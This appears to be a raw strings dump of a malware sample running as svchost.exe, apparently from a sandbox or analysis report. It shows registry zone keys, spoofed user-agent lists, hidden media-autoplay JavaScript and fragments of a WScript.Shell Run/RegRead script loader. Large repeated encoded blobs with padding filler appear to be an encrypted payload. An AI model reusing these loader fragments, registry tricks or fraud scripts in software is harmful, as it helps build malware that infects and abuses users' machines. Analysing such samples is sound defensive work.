x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX2
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation

svchost.exe_472:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
wininet.dll
user32.dll
ntdll.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Kernel32.dll
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
HTTP/1.1
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
winmm.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
?"?&?*?.?
11
3,313[3`3
6 7%7s7
56O6\6n6
4.434[4`4
GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns  kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1  833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk  X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns  kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1  833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk  X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX7
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
